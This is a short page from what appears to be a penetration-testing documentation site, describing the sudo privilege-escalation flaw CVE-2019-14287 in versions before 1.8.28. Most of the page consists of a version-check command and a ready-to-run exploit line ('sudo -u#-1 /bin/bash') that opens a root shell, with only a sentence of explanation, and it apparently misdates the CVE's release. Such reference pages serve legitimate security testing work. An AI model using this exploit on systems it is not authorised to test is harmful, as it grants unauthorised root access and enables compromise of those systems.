> For the complete documentation index, see [llms.txt](https://infra.newerasec.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://infra.newerasec.com/infrastructure-testing/privilege-esclation/linux/cve-2019-14287.md).

# CVE-2019-14287

&#x20;There was a public CVE release in November 2019 about how there were other ways to enter root besides `root` that got around this restriction. This impacts `sudo` versions before 1.8.28.

find sudo version:

`sudo --version`

exploit:

`sudo -u#-1 /bin/bash`
